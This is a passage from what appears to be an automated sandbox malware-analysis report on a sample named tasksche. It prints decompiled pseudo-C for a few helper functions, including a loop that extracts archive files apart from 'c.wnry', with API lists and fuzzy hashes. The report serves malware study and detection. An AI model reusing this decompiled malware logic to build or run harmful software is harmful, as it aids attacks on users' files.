                                                                                                                                                • SetLastError.KERNEL32(0000007F,?,0000DDB6,?,?,?,00402150,00000000,TaskStart), ref: 004029A7
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorLast_stricmp
                                                                                                                                                • String ID: P!@
                                                                                                                                                • API String ID: 1278613211-1774101457
                                                                                                                                                • Opcode ID: 03c3627be8870cecb91afdd38bef801573c0f783d9791e09bb9b18ce57a97af9
                                                                                                                                                • Instruction ID: aaf1e2d36ba78ebe43aa6e6aad127835d86855a49192f4e92224227a9dbc2408
                                                                                                                                                • Opcode Fuzzy Hash: 03c3627be8870cecb91afdd38bef801573c0f783d9791e09bb9b18ce57a97af9
                                                                                                                                                • Instruction Fuzzy Hash: 432180B1700605EFDB14CF19DA8486A73F6EF89310B29857AE846EB381D678ED41CB85
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00401DFE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59stringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 89%
                                                                                                                                                			E00401DFE(void* __eax) {
				int _t21;
				signed int _t27;
				signed int _t29;
				void* _t34;
				void* _t36;
				void* _t38;
				void* _t40;
				void* _t41;
				void* _t43;

				_t36 = __eax;
				_t41 = _t40 + 0xc;
				if(__eax != 0) {
					 *(_t38 - 0x12c) =  *(_t38 - 0x12c) & 0x00000000;
					_t29 = 0x4a;
					memset(_t38 - 0x128, 0, _t29 << 2);
					E004075C4(_t36, 0xffffffff, _t38 - 0x12c);
					_t27 =  *(_t38 - 0x12c);
					_t43 = _t41 + 0x18;
					_t34 = 0;
					if(_t27 > 0) {
						do {
							E004075C4(_t36, _t34, _t38 - 0x12c);
							_t21 = strcmp(_t38 - 0x128, "c.wnry");
							_t43 = _t43 + 0x14;
							if(_t21 != 0 || GetFileAttributesA(_t38 - 0x128) == 0xffffffff) {
								E0040763D(_t36, _t34, _t38 - 0x128);
								_t43 = _t43 + 0xc;
							}
							_t34 = _t34 + 1;
						} while (_t34 < _t27);
					}
					E00407656(_t36);
					_push(1);
					_pop(0);
				} else {
				}
				return 0;
			}












                                                                                                                                                0x00401dfe
                                                                                                                                                0x00401e00
                                                                                                                                                0x00401e05
                                                                                                                                                0x00401e0e
                                                                                                                                                0x00401e1a
                                                                                                                                                0x00401e21
                                                                                                                                                0x00401e2d
                                                                                                                                                0x00401e32
                                                                                                                                                0x00401e38
                                                                                                                                                0x00401e3b
                                                                                                                                                0x00401e3f
                                                                                                                                                0x00401e41
                                                                                                                                                0x00401e4a
                                                                                                                                                0x00401e5b
                                                                                                                                                0x00401e60
                                                                                                                                                0x00401e65
                                                                                                                                                0x00401e82
                                                                                                                                                0x00401e87
                                                                                                                                                0x00401e87
                                                                                                                                                0x00401e8a
                                                                                                                                                0x00401e8b
                                                                                                                                                0x00401e41
                                                                                                                                                0x00401e90
                                                                                                                                                0x00401e96
                                                                                                                                                0x00401e98
                                                                                                                                                0x00401e07
                                                                                                                                                0x00401e07
                                                                                                                                                0x00401e9d

                                                                                                                                                APIs
                                                                                                                                                • strcmp.MSVCRT(?,c.wnry,?,00000000,?), ref: 00401E5B
                                                                                                                                                • GetFileAttributesA.KERNEL32(?), ref: 00401E6E
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AttributesFilestrcmp
                                                                                                                                                • String ID: c.wnry
                                                                                                                                                • API String ID: 3324900478-3240288721
                                                                                                                                                • Opcode ID: cc95b26050e750b8ddedfaa82b6fbbed5bde767aecf08ad1744914d0cf1c8067
                                                                                                                                                • Instruction ID: 6f95607eaad4b3b0c5796a2914108af7bfa48759f01996e65d2c9759274caab0
                                                                                                                                                • Opcode Fuzzy Hash: cc95b26050e750b8ddedfaa82b6fbbed5bde767aecf08ad1744914d0cf1c8067
                                                                                                                                                • Instruction Fuzzy Hash: 3001C872D041142ADB209625DC41FEF336C9B45374F1005B7FA44F11C1E739AA998ADA
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00405C9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 84%
                                                                                                                                                			E00405C9F(signed int __eax, intOrPtr _a4) {
				intOrPtr _t9;

				_t9 = _a4;
				if(_t9 != 0) {
					if( *((char*)(_t9 + 0x10)) != 0) {
						CloseHandle( *(_t9 + 4));
					}
					_push(_t9);
					L004076E8();
					return 0;
				} else {
					return __eax | 0xffffffff;
				}
			}




                                                                                                                                                0x00405ca0
                                                                                                                                                0x00405ca6
                                                                                                                                                0x00405cb1
                                                                                                                                                0x00405cb6
                                                                                                                                                0x00405cb6
                                                                                                                                                0x00405cbc
                                                                                                                                                0x00405cbd
                                                                                                                                                0x00405cc6
                                                                                                                                                0x00405ca8
                                                                                                                                                0x00405cac
                                                                                                                                                0x00405cac

                                                                                                                                                APIs
                                                                                                                                                • CloseHandle.KERNEL32(?,$l@,00406118,$l@,?,00000000,00000000), ref: 00405CB6
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,$l@,00406118,$l@,?,00000000,00000000), ref: 00405CBD
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??3@CloseHandle
                                                                                                                                                • String ID: $l@
                                                                                                                                                • API String ID: 3816424416-2140230165
                                                                                                                                                • Opcode ID: 95d67fc171dea6c803f2538cd8e9bf2129e8d776d8110548eb6437a9e23f5d7b
                                                                                                                                                • Instruction ID: 673c02d0cae411eac5e44946f87937de45fd09569792d44698d585129e0307c2
                                                                                                                                                • Opcode Fuzzy Hash: 95d67fc171dea6c803f2538cd8e9bf2129e8d776d8110548eb6437a9e23f5d7b
                                                                                                                                                • Instruction Fuzzy Hash: 47D05E3280DE211BE7226A28B90469B2B949F01330F054A6EE4A1A25E2D7789C8596CC
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004019E1 Relevance: 5.0, APIs: 4, Instructions: 39COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 25%
                                                                                                                                                			E004019E1(void* __ecx, void* _a4, int _a8, void* _a12, int* _a16) {
				void* _t13;
				void* _t16;
				struct _CRITICAL_SECTION* _t19;
				void* _t20;

				_t20 = __ecx;
				if( *((intOrPtr*)(__ecx + 8)) == 0) {
					L3:
					return 0;
				}
				_t19 = __ecx + 0x10;
				EnterCriticalSection(_t19);
				_t13 =  *0x40f8a4( *((intOrPtr*)(_t20 + 8)), 0, 1, 0, _a4,  &_a8);
				_push(_t19);
				if(_t13 != 0) {
					LeaveCriticalSection();
					memcpy(_a12, _a4, _a8);
					 *_a16 = _a8;
					_t16 = 1;
					return _t16;
				}
				LeaveCriticalSection();
				goto L3;
			}







                                                                                                                                                0x004019e5
                                                                                                                                                0x004019ec
                                                                                                                                                0x00401a19
                                                                                                                                                0x00000000
                                                                                                                                                0x00401a19
                                                                                                                                                0x004019ee
                                                                                                                                                0x004019f2
                                                                                                                                                0x00401a08
                                                                                                                                                0x00401a10
                                                                                                                                                0x00401a11
                                                                                                                                                0x00401a1d
                                                                                                                                                0x00401a2c
                                                                                                                                                0x00401a3a
                                                                                                                                                0x00401a3e
                                                                                                                                                0x00000000
                                                                                                                                                0x00401a3e
                                                                                                                                                0x00401a13
                                                                                                                                                0x00000000

                                                                                                                                                APIs
                                                                                                                                                • EnterCriticalSection.KERNEL32(?,00000000,?,?,00401642,?,?,?,?), ref: 004019F2
                                                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,00401642,?,?,?,?), ref: 00401A13
                                                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,00401642,?,?,?,?), ref: 00401A1D
                                                                                                                                                • memcpy.MSVCRT(?,?,?,?,?,00401642,?,?,?,?), ref: 00401A2C
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CriticalSection$Leave$Entermemcpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3435569088-0
                                                                                                                                                • Opcode ID: fd5125ef58b43d2b94afe930c36afa05085028d191ff952fa05313044055aa85
                                                                                                                                                • Instruction ID: 582611ac2dab466912340a9d1f37a03f8b1d3421f3d1388c7c0078807ea36f1a
                                                                                                                                                • Opcode Fuzzy Hash: fd5125ef58b43d2b94afe930c36afa05085028d191ff952fa05313044055aa85
                                                                                                                                                • Instruction Fuzzy Hash: 7FF0A432200204FFEB119F90DD05FAA3769EF44710F008439F945AA1A0D7B5A854DB65
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%